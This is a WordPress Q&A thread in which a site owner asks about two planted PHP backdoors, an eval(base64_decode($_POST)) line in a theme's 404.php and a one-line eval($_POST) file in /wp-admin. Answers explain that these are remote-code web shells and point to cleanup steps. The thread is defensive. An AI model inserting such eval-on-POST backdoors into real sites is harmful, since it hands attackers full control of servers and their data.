# Suspicious Files

Tags: security, hacked

Hi I found two suspicious files on my site:

1. The first in my theme (`404.php`), with  this line added

   `<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>`
2. The second in `/wp-admin/` called `wp-class.php`.

   The only line there was: `<?eval($_POST[joao]);?>`

Can anyone tell me what are this doing, and what steps should I take ?

Comment: It is only after editing your question that your code became readable and the nature of the question clear. It is now, that I can't help but inform you that [question regarding the recovery from hacks are deemed *off-topic*](http://wordpress.stackexchange.com/faq) on this stack.

Comment: That being said: Yes those are highly suspicious file contents. And `/wp-admin/wp-class.php` is **not** a WP-core file. Delete those files. Have a look at [FAQ | My site was hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [Verifying that I have fully removed a WordPress hack](http://wordpress.stackexchange.com/questions/19696/verifying-that-i-have-fully-removed-a-wordpress-hack).

Comment: thanks, but i also try to understand the meaning of the codes I posted here, to better understand what happened here

Comment: @JohannesPille The question is primarily about understanding the code – and that’s fine here.

Comment: I don't see how a question being primarily code related makes it inherently on-topic, @toscho. The code related aspect can be paraphrased as "What do the PHP `eval` and `base64_decode` functions do?" Under that light, it isn't off-topic because it's about the recovery from a hack, I'll give you that, but it instantly becomes off-topic due to it being a *pure PHP question*. Agree to disagree, I guess. (sidenote: +1 anyway)

Comment: @JohannesPille Yes, it is a pure PHP question. But it would be closed as _to localized_ very fast on SO, so I don’t want to migrate it, because the asker should get an answer, and we might need these answers for future reference. I don’t mind closing it later; I just think it is fine to keep it here.

Answer (score 3):

1. When someone sends a POST request with a variable `php` and a base 64 encoded value that is PHP code after decoding it, that PHP code will run with the permissions of all your own PHP files. The attacker can read all database content, create new users, upload files …
2. The second code does the same, just without encoding the PHP.

Both injections are rather primitive; they look almost as if they *should* be found to make you feel safe when you remove them.

It is very likely that these snippets are not the only problems. The attacker has used his new site probably and added some files. Read [Verifying that I have fully removed a WordPress hack?](https://wordpress.stackexchange.com/questions/19696/verifying-that-i-have-fully-removed-a-wordpress-hack) and follow all suggestions mentioned there.

Find the back door. Read your log files if they aren’t already compromised.

Answer (score 0):

Those lines of code are almost surely malicious. To hinder the webmaster's ability to search for strings, malicious content is often hidden in an encoded format, like base64.

In my experience, the most common version of this attack outputs a hidden iframe that loads an external malicious URL (which may be used for a number of purposes).

Scan your site with [Quttera (internally)](http://wordpress.org/extend/plugins/quttera-web-malware-scanner/) and [Sucuri (externally)](http://sitecheck.sucuri.net/scanner/) and see if you can identify and remove all instances of the attack.

Comment: Interestingly, I just read about WP attacks that target only accidental 404 traffic to redirect them.

At a glance, this doesn't appear to be what you have, but I thought I'd comment it here just as a curiosity: http://blog.sucuri.net/2013/04/wordpress-malicious-plugin-wpppm-abusing-404-redirects-with-seo-poisoning.html